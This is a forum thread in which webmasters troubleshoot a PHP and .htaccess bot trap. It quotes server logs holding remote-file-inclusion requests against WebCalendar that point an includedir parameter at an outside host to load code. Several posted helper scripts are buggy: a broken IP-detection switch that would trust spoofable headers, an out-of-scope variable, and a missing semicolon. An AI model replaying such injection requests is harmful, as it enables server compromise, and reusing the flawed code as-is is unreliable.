Forum Moderators: coopster
[Thu Sep 27 12:19:07 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/<wbr
[Thu Sep 27 12:19:10 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/ws
[Thu Sep 27 12:19:12 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/<wbr
[Thu Sep 27 12:19:29 2007] [error] [client 202.57.69.xx] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/<wbr
In the access files for the same period and the same IP I find the equivalent entries which are a clearly recognisable hack attempt aimed at my bot-trap files, but not getting caught by them.
202.57.69.xx - - [27/Sep/2007:12:19:07 +0100] "GET /WebCalendar/%3Cwbr%20/%3Eview_entry.php?id=25&date=20070703//ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
202.57.69.xx - - [27/Sep/2007:12:19:10 +0100] "GET //ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
202.57.69.xx - - [27/Sep/2007:12:19:12 +0100] "GET /WebCalendar/%3Cwbr%20//ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
202.57.69.xx - - [27/Sep/2007:12:19:29 +0100] "GET /WebCalendar/%3Cwbr%20/%3Eview_entry.php?id=29&date=20070719//ws/get_events.php?includedir=http://teamwork.example.net/id.txt? HTTP/1.1" 404 8752 "-" "libwww-perl/5.76"
The files this bot was accessing according to the access file, were my bot-traps (view_entry.php, get_events.php) yet they didn't get sprung and the bot's IP did not get added to my .htaccess file. I know the traps are working because they trap ME if I go to them.
I suspect that it has something to do with that "<wbr" string in the error file entry, and the equivalent "%3Cwbr%20" string in the access file entry.
I've added this Philippines based IP address to my ban list anyway but was curious as to how they avoided the trap?
Thanks in advance.
[edited by: jatar_k at 12:15 pm (utc) on Sep. 27, 2007]
[edit reason] examplified and no specific ips thanks [/edit]
However there is another solution -
If this webcalendar is in an area that humans are very unlikely to get to then why not just ban anyone looking at that area?
I have a bot trap on most of my sites and they are accessed by a 1x1 clear pixel with no alt attribute and the directory is disallowed in my robots.txt. Just in case a person actually gets to the page the first page of the bot trap is a warning telling people to go back and not click on any of the links. If they choose to use any of the links then they are added to my blocked list.
That would save any bothering to filter the urls to check if they are allowed or not...just ban them all >:)
And I do have some links to some of the traps that humans won't use as you describe.
But these particular ones are not accessed by crawling, but by "direct" visits, from bots who already know about them. My query is how this particular visit managed to get to the files without springing the trap.
Basically the fake php file calls a trap script (in the same directory) which writes the IP to .htaccess.
Here is the relevant section of the trap - names changed.
**********************************
<?php
include 'trap-script.php';
?>
************************************
and here is the relevant section of script
************************************
<?php
// author: seven-3-five, 2006-09-04, seven-3-five.blogspot.com
//this script is the meat and potatoes of the bot-trap
// 1. It sends you an email when the page /badbots.php is visited.
//The email contains various info about the visitor.
//2. It adds the directive
//'deny from $ip' ($ip being the visitor's ip address)
//to the bottom of your .htaccess file.
// SERVER VARIABLES USED TO IDENTIFY THE OFFENDING BOT
$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$request = $_SERVER['REQUEST_URI'];
$referer = $_SERVER['HTTP_REFERER'];
// ADD 'deny from $ip' TO THE BOTTOM OF YOUR MAIN .htaccess FILE
$text = 'deny from ' . $ip . "\n";
$file = '/var/www/vhosts/example.org.uk/httpdocs/.htaccess';
add_badbot($text, $file);
// Function add_bad_bot($text, $file_name): appends $text to $file_name
// make sure PHP has permission to write to $file_name
function add_badbot($text, $file_name) {
$handle = fopen($file_name, 'a');
fwrite($handle, $text);
fclose($handle);
}
****************************************
Tne bad guy in question was definitely aiming for those files. But he didn't get sprung. If I go for those files, the trap works - and it works for plenty of other visitors. This is the first time I have seen that <wbr string in the logs. It generates a File does not exist message in the error log, but the access log shows it actually looking for a specific trap file. Maybe its just a badly programmed bot that never actually located the trap - I'm new to this stuff which is why I posted the actual log entries.
Thanks.
[edited by: eelixduppy at 12:48 pm (utc) on Sep. 27, 2007]
[edit reason] exemplified [/edit]
Also was that the complete set of the code for the bot trap? As there seems to be a bit missing. As if you are clocking everyone that calls the script then it doesnt matter if they have a refering page or not.
btw -
the <wbr> is a word break tag. Not often used but it allows browsers to put in word breaks in very long words. Most useful for tables where is you have content that is very long you can allow the browser to break up that word i.e. getElementByTagName in a <th> then most of the <td>'s are going to have very short content so you could break the header by putting getElement<wbr>ByTagName.
I have seen it used to confuse other browsers/scripts but not seen it used that way in php. Usually when people are trying to inject some code into something that shouldnt accept it...like IE with its numerous XSS exploits.
I am going to experiment with it and will report back if I manage to do anything interesting. However as php doesnt parse the (x)html it shouldnt take any notice of those tags.
[edited by: PHP_Chimp at 12:59 pm (utc) on Sep. 27, 2007]
the script exerpts were just that - exerpts. the files as a whole do work - but I just posted the relevant bits to save on length! If you want the whole files that's fine. I didn't get my notifying "a bad bot has just been banned" email nor did the IP get added to .htaccess.
Everyone that hits that trap file gets automatically onto my .htaccess - because no humans or good bots should get there.
Have fun. Note that the string in the file is <wbr and not <wbr> - I did the google on <wbr> and saw what it was meant to be.
Thanks
So here is a quick and dirty version of what im using -
<?php
function userIP(){
switch ($_SERVER){
case 'HTTP_CLIENT_IP':
$userip = $_SERVER['HTTP_CLIENT_IP'];
break;
case 'HTTP_X_FORWARDED_FOR':
$userip = $_SERVER['HTTP_X_FORWARDED_FOR'];
break;
case 'HTTP_X_FORWARDED':
$userip = $_SERVER['HTTP_X_FORWARDED'];
break;
case 'HTTP_FORWARDED_FOR':
$userip = $_SERVER['HTTP_FORWARDED_FOR'];
break;
case 'HTTP_FORWARDED':
$userip = $_SERVER['HTTP_FORWARDED'];
break;
default:
$userip = $_SERVER['REMOTE_ADDR'];
break;
}
return $userip;
}
function tel_me(){
$day = date("Y-m-d-(D)-H:i:s",time());
$from = "badbot-watch@example.com\r\n";
$to = "chimp@example.com";
$subject = "Alert: bad robot";
$msg = "A bad bot hit ". $_SERVER['REQUEST_URI'] ."\nat ". $day . " \n";
$msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$msg = wordwrap($msg, 70);
mail($to, $subject, $msg, "From: $from");
}
function block_bot($t, $f){
$fh = fopen($f, 'ab');// open in binary mode just in case
fwrite($fh, $t);
fclose($fh);
}
$bot_ip = userIP();
// block the bot
$txt = "deny from $bot_ip\n";
$file = '/path/to/your/htaccess';
block_bot($txt, $file);
tel_me();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>That was a silly thing to do!</title>
</head>
<body>
<h1>Congratulations</h1>
<p>You have succeeded in getting your self blocked from this site.<br />
You were warned about coming here. Have a nice life.</p>
<p>Bye</p>
</body>
</html>
Assuming your /WebCalendar/ is the nonhuman accessible directory then if you use the following in your htaccess
RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI}!^WebCalendar/get_lost.php$
RewriteCond %{REQUEST_URI}!^WebCalendar/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the get_lost.php page and your_last_warning
RewriteRule ^(.*)$ /WebCalendar/get_lost.php [L]
# should send everything through this script.
get_lost.php will block them
your_last_warning.php is the page where you can tell them not to click any other links. It is the only safe page in the directory.
Please test this first, as I have just written this out of my head so there may well be some problems with it. If there are then come back and im sure I or someone else can sort it.
[edited by: PHP_Chimp at 1:41 pm (utc) on Sep. 27, 2007]
However I dont think that it will make any difference to php as it doesnt parse the (x)html tags.
[edited by: PHP_Chimp at 1:45 pm (utc) on Sep. 27, 2007]
I first discovered traps about a fortnight ago, along with .htaccess. So its all been uphill since there. I like the look of that script - I've copied it and will try it out. I'll be back (but not for a while - need more coffee myself!)
As for php - only discovered that when I started installing things like calendars but I don't understand a word of it - just good at cutting and pasting and following instructions. (like a computer!)
Still don't know why I didn't catch that Filipino bot in my net though!
Final question before I go off and try all this out. Can a site sub-directory be given its own .htaccess file and used as a test bed for this sort of stuff?
If you have problems with the htaccess there is an apache forum here, they will sort it all out for you. Or come back but this is php, so you may well get a faster (maybe better) answer from the apache forum.
Good luck.
Your last warning.php contains a 1x1 transparent gif image link to the get_lost.php as does my main root index.html file.
robots.txt already had the /trap/ directory so no changes needed there. Search engines know not to go there.
I put the .htaccess fragment in place
I am assuming I do not have to actually put the traps into /WebCalendar/ merely rely on the .htaccess fragment to redirect requests for any files in that directory (including ones that aren't there?) to the /trap/your_last_warning.php?
The htaccess fragment you gave me is denying me access to my site and throwing up a server configuration error.
The line that kills the site is
RewriteRule ^(.*)$ /WebCalendar/get_lost.php [L]
What does that line actually do?
If I remark out that line then I get access again. But I can't figure out the .htaccess combination that both allows my site to work, and will fire the trap if I go looking for a non-existent file in the /WebCalendar directory.
I'm getting error messages about max redirect limits being exceeded.
The actual trap works - if I click on the script it does what it says on the tin.
I'll shoot over to the .htaccess department!
RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI}!^WebCalendar/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /WebCalendar/get_lost.php [L]
# should send everything through this script.
The rewriteCond is a condition for the rewriteRule to apply to.
So the RewriteRule in this case is asking for everything (.*) any single character . as many times as you like * to be sent through to the /WebCalendar/get_lost.php page.
If the actual script get_lost.php is in a diffrent location then you will need to change the /WebCalendar/get_lost.php [L] to point to the correct location. The [L] just makes sure that this is the last rule applied, so stops the server continuing on when you want the request sent to the bot trap.
doesn't crash the site (but doesn't do the job of course)
RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI}!^trap/your_last_warning.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /trap/get_lost.php [L]
# should send everything through this script.
DOES crash the site and gives me the error message
[Thu Sep 27 18:30:25 2007] [alert] [client my IP] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$'
Here is a visitor who was hacking away while I was testing
[Thu Sep 27 18:30:25 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/profile.php?mode=register&sid=22568d8c267ef528daf7bae8c890f9a5
[Thu Sep 27 18:30:29 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/posting.php?mode=newtopic&f=7&sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:30 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/posting.php?mode=newtopic&f=7&sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:32 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/viewforum.php?f=7&sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:34 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/phpBB//index.php?sid=a52cca456ae9a3ca49174beea8c37027
[Thu Sep 27 18:30:38 2007] [alert] [client 222.122.43.xx] /var/www/vhosts/mydomain/httpdocs/.htaccess: RewriteCond: bad argument line '%{REQUEST_URI}!^trap/your_last_warning.php$', referer: http://example.com/index.php?sid=a52cca456ae9a3ca49174beea8c37027
Grateful for the help. I've also asked in the .htaccess forum.
[edited by: jatar_k at 7:55 pm (utc) on Sep. 27, 2007]
[edit reason] please use exampe.com and remove ips [/edit]
There needs to be a space (or more, so you can use tab to line things up if you want) between the %{REQUEST_URI} and the!^
Let me know if that helps
edit -
It doesnt seem to be letting that line of code display with a space in there. Just add the space to see if that sorts it.
[edited by: PHP_Chimp at 7:53 pm (utc) on Sep. 27, 2007]
I've got the files in place. /trap/ has both files and they work.
If I then browse to mydomain/WebCalendar/garbage.anythingyoulike
I get my error document because the file doesn't exist, but I don't get banned and it doesn't write my IP to .htaccess
I don't get a bad bot email either.
If I go straight to the /trap/get_lost.php page manually, in the trap folder it does work - I get banned, and my customised 403 page displays.
So - the redirection isn't working but the trap is.
Here is what I have in .htaccess at the moment
Rewriteengine ON
RewriteRule ^$ /index.html [R,NC,L]
RewriteCond %{REQUEST_URI} ^WebCalendar/
RewriteCond %{REQUEST_URI}!^trap/your_last_warning.php$
RewriteCond %{REQUEST_URI}!^trap/get_lost.php$
# should rewrite everything starting with WebCalendar/
# except the your_last_warning
RewriteRule ^(.*)$ /trap/get_lost.php [L]
# should send everything through this script.
ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
<Files .htaccess>
order allow,deny
deny from all
</Files>
<FilesMatch "\.php$">
order allow,deny
allow from all
# </FilesMatch>
ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
#<Files .htaccess>
#order allow,deny
#deny from all
#</Files>
#order allow,deny
deny from # long list
#allow from all
</FilesMatch>
Error messages include:
[Thu Sep 27 21:09:36 2007] [error] [client ***.142.249.9] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/rubish
[Thu Sep 27 21:09:39 2007] [error] [client ***.142.249.9] File does not exist: /var/www/vhosts/mydomain/httpdocs/WebCalendar/rubish
[Thu Sep 27 21:09:47 2007] [error] [client ***.142.249.9] Directory index forbidden by rule: /var/www/vhosts/mydomain/httpdocs/WebCalendar/
Thanks for sticking with this!
The fragment is now:
Rewriteengine ON
RewriteRule ^$ /index.html [R,NC,L]
#
RewriteCond %{REQUEST_URI}!/trap/your_last_warning\.php$
RewriteCond %{REQUEST_URI}!^/trap/get_lost\.php$
# should rewrite everything starting with WebCalendar/ except the warning.php
RewriteRule ^WebCalendar/ /trap/get_lost.php [L]
# should send everything through this script.
ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
<Files .htaccess>
order allow,deny
deny from all
</Files>
<FilesMatch "\.php$">
order allow,deny
allow from all
ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
deny from # list of IPs
</FilesMatch>
*************************end of .htaccess
The folder being redirected is /WebCalendar/
The warning file is /trap/your_last_warning.php
The trap script is /trap/get_lost.php
The result is that a request for something like
"/WebCalendar/anyoldrubbish.whateverfiletype" now fires off the trap, sends me an email, writes the IP to .htaccess and denies access, while displaying a message for an innocent inheritor of a blocked IP to contact the webmaster.
On further attempts to access the site home page they get my customised error page which also has contact details.
All I then need to do is check .htaccess every now and then to put the added IP's into the "alphabetically sorted" list and check for any oft-repeated ranges that I can lump together into a banned range rather than just individual ones.
This is exactly what I wanted. Thanks to those both here and in the php forum for helping me get it right! That will keep the bots chasing old WebCalendar vulnerabilities off my site for a short while!
I am very grateful.
I have a similar emailing script that puts the banned IP into the email so I may try and work that into your emailing script. If I do I'll come back and report. Many many thanks.
The email the script sends is not delivering the IP address of the intruding bot. My error logs give the following - which seems to indicate the problem:
PHP Notice: Undefined variable: bot_ip in /var/www/vhosts/mydomain/httpdocs/trap/get_lost.php on line 33
line 33 of the script reads:
msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
the resulting bad bot email reads: (there is a blank after "address is" instead of the IP)
************************************
A bad bot hit /WebCalendar/any.file
at 2007-09-28-(Fri)-15:14:40
address is
agent is Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.7)
Gecko/20070914 Firefox/2.0.0.7
*************************************
the get_lost script is here: the "$bot_ip" string seems to work when applied to writing to .htaccess but doesn't seem to return a result when writing the email
*********************************
<?php
function userIP(){
switch ($_SERVER){
case 'HTTP_CLIENT_IP':
$userip = $_SERVER['HTTP_CLIENT_IP'];
break;
case 'HTTP_X_FORWARDED_FOR':
$userip = $_SERVER['HTTP_X_FORWARDED_FOR'];
break;
case 'HTTP_X_FORWARDED':
$userip = $_SERVER['HTTP_X_FORWARDED'];
break;
case 'HTTP_FORWARDED_FOR':
$userip = $_SERVER['HTTP_FORWARDED_FOR'];
break;
case 'HTTP_FORWARDED':
$userip = $_SERVER['HTTP_FORWARDED'];
break;
default:
$userip = $_SERVER['REMOTE_ADDR'];
break;
}
return $userip;
}
function tel_me(){
$day = date("Y-m-d-(D)-H:i:s",time());
$from = "badbots@mydomain\r\n"; //edit for the right email address
$to = "badbots@mydomain"; //edit for the right email address
$subject = "Alert: bad robot";
$msg = "A bad bot hit ". $_SERVER['REQUEST_URI'] ."\nat ". $day . " \n";
msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$msg = wordwrap($msg, 70);
mail($to, $subject, $msg, "From: $from");
}
function block_bot($t, $f){
$fh = fopen($f, 'ab');// open in binary mode just in case
fwrite($fh, $t);
fclose($fh);
}
$bot_ip = userIP();
// block the bot
$txt = "deny from $bot_ip\n";
$file = '/var/www/vhosts/mydomain/httpdocs/.htaccess'; //edit for path to your htaccess file
block_bot($txt, $file);
tel_me();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>That was a silly thing to do!</title>
</head>
<body>
<h1>Congratulations</h1>
<p>You have succeeded in getting your self blocked from this site.<br />
You were warned about coming here. Have a nice life.</p>
<p>Bye</p>
</body>
</html>
****************************************
Any ideas why the IP isn't getting into the email?
Many thanks.
All suggestions gratefully received!
SCRIPTcalled get_lost.php - it is accompanied by a warning page called your_last_warning.php (see .htaccess file )
<?php
function userIP(){
switch ($_SERVER){
case 'HTTP_CLIENT_IP':
$userip = $_SERVER['HTTP_CLIENT_IP'];
break;
case 'HTTP_X_FORWARDED_FOR':
$userip = $_SERVER['HTTP_X_FORWARDED_FOR'];
break;
case 'HTTP_X_FORWARDED':
$userip = $_SERVER['HTTP_X_FORWARDED'];
break;
case 'HTTP_FORWARDED_FOR':
$userip = $_SERVER['HTTP_FORWARDED_FOR'];
break;
case 'HTTP_FORWARDED':
$userip = $_SERVER['HTTP_FORWARDED'];
break;
default:
$userip = $_SERVER['REMOTE_ADDR'];
break;
}
return $userip;
}
function tel_me(){
$day = date("Y-m-d-(D)-H:i:s",time());
$from = "badbots@mydomain\r\n"; //edit for the right email address
$to = "badbots@mydomain"; //edit for the right email address
$subject = "Alert: bad robot";
$msg = "A bad bot hit ". $_SERVER['REQUEST_URI'] ."\nat ". $day . " \n";
$msg .= "address is " . $bot_ip . "\nagent is " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$msg = wordwrap($msg, 70);
mail($to, $subject, $msg, "From: $from");
}
function block_bot($t, $f){
$fh = fopen($f, 'ab');// open in binary mode just in case
fwrite($fh, $t);
fclose($fh);
}
$bot_ip = userIP();
// block the bot
$txt = "deny from $bot_ip\n";
$file = '/var/www/vhosts/mydomain/httpdocs/.htaccess'; //edit for path to your htaccess file
block_bot($txt, $file);
tel_me();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>That was a silly thing to do!</title>
</head>
<body>
<h1>Congratulations</h1>
<p>You have succeeded in getting your self blocked from this site.<br />
You were warned about coming here. Have a nice life.</p>
<p> If you have no idea why you have been banned then it may be that you have inherited an IP (Internet Protocol) address from someone who previously used it to try and hack our site. In which case please feel free to email our webmaster and give him your present IP address and ask for it to be unbanned. Sorry for the inconvenience! If you don't know what your IP address is right now, then open another browser window or tab and go to [whatismyip.com...] and it will be displayed on the screen. Then copy and paste it into an email to webmaster AT mydomain and we'll look into it.
<p>Bye</p>
</body>
</html>
.htaccess file (I've added an indicator of where there is a space in one of the statements, this board seems to remove them!
Rewriteengine ON
RewriteRule ^$ /index.html [R,NC,L]
#
RewriteCond %{REQUEST_URI}*spacehere*!/trap/your_last_warning\.php$
RewriteCond %{REQUEST_URI}*spacehere*!/trap/get_lost\.php$
RewriteCond %{REQUEST_URI}*spacehere*!^/trap/get_lost\.php$
# should rewrite everything starting with WebCalendar/ except the warning.php
RewriteRule ^WebCalendar/ /trap/get_lost.php [L]
# should send everything through this script.
ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
<Files .htaccess>
order allow,deny
deny from all
</Files>
<FilesMatch "\.php$">
order allow,deny
allow from all
ErrorDocument 403 /403.htm
ErrorDocument 404 /404.htm
ErrorDocument 500 /500.htm
deny from # list of IPs
</FilesMatch>
However below is a bit of modified code that will write what you want direct into your htaccess.
change $t = "\ndeny from $bot_ip\n</FilesMatch>";
function block_bot($t, $f){
$size = filesize($f);
$s = $size-14; // </filesMatch> == 14 bytes
$fh = fopen($f, 'r+b'); // open in binary mode just in case
fseek($fh, $s)
fwrite($fh, $t);
fclose($fh);
}
Although this works you may want to think about manually blocking people as a lot of ip's are dynamic so if you block one they will renew there connection, get another address and get blocked. Each time you add another line of text to the htaccess file it gets larger and as the server reads this file before anything else is processed if you have a 20k htaccess file you have effectively added 20k to every request that you make on the server so it will be a lot slower. Blocking by user agent can be very effective, block by IP when there is no other solution.
I guess that I should have pointed that out at the beginning, but I wasn't concentrating on the end result...just fixing the script...will try harder next time ;)
I also wondered about letting the IP list grow chronologically from the bottom, putting any "ranges" at the bottom, and then taking off the top half every now and again - like once a week or fortnight depending on traffic. If it's a regular bot it will ban itself next time it visits - if it is very irregular it's a waste having the IP, if it's moved on then the IP might as well be unblocked anyway.
Thanks again for the input.